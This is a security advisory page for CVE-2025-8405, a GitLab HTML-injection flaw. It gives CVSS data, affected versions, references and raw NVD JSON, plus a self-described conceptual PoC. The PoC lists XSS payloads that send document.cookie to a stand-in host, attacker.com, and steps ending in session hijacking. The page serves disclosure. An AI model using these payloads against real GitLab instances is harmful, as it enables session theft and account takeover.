Security Vulnerability Report
CVE-2025-8405 CVSS 7.7 HIGH

Published: 2025-12-11 05:16:38
Last Modified: 2025-12-23 21:01:49

Description

GitLab has remediated a security issue in GitLab CE/EE affecting all versions from 17.1 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to perform unauthorized actions on behalf of other users by injecting malicious HTML into vulnerability code flow displays.

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE
GitLab CE/EE: all versions from 17.1 before 18.4.6
GitLab CE/EE: all versions from 18.5 before 18.5.4
GitLab CE/EE: all versions from 18.6 before 18.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-8405 PoC - GitLab HTML Injection in Vulnerability Code Flow
// This PoC demonstrates the HTML injection vulnerability in GitLab's vulnerability reporting feature
// Note: This is a conceptual PoC based on the vulnerability description.
// Actual exploitation requires a valid GitLab account with permission to create vulnerability reports.

// Malicious payload that could be injected into the vulnerability code flow:
const maliciousPayload = {
  title: 'Test Vulnerability',
  description: '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>',
  // Alternative payloads:
  alternativePayloads: [
    '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">',
    '<svg onload="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">',
    '<a href="javascript:fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">Click me</a>'
  ]
};

// Attack flow:
// 1. Attacker creates a new vulnerability report with malicious HTML/JS payload
// 2. Payload is stored in GitLab database without proper sanitization
// 3. When victim views the vulnerability report, payload executes in victim's browser
// 4. Attacker steals victim's session cookie
// 5. Attacker hijacks victim's account

console.log('CVE-2025-8405 PoC - HTML Injection in GitLab Vulnerability Code Flow');
console.log('Affected Versions: GitLab CE/EE 17.1 to <18.4.6, 18.5 to <18.5.4, 18.6 to <18.6.2');

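References

https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ (Release Notes, Vendor Advisory)
https://gitlab.com/gitlab-org/gitlab/-/issues/558214 (Broken Link)
https://hackerone.com/reports/3270940 (Permissions Required)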

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8405", "sourceIdentifier": "[email protected]", "published": "2025-12-11T05:16:38.447", "lastModified": "2025-12-23T21:01:48.923", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated a security issue in GitLab CE/EE affecting all versions from 17.1 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to perform unauthorized actions on behalf of other users by injecting malicious HTML into vulnerability code flow displays."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "17.1.0", "versionEndExcluding": "18.4.6", "matchCriteriaId": "8B96998F-2DA2-48A0-A574-C192E218F193"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "17.1.0", "versionEndExcluding": "18.4.6", "matchCriteriaId": "293FA588-D122-4DCC-BD11-47FE16216D5F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.4", "matchCriteriaId": "457DB333-60BE-44CD-A674-216AB658E14E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", 
"versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.4", "matchCriteriaId": "910967DB-0A8C-4436-9D9E-37BD610E7367"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.6.0", "versionEndExcluding": "18.6.2", "matchCriteriaId": "919A2588-3EA1-4E15-B47E-61B3E14B2781"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.6.0", "versionEndExcluding": "18.6.2", "matchCriteriaId": "6343A083-3E1C-4551-B230-76CABC3FDD67"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/558214", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3270940", "source": "[email protected]", "tags": ["Permissions Required"]}]}}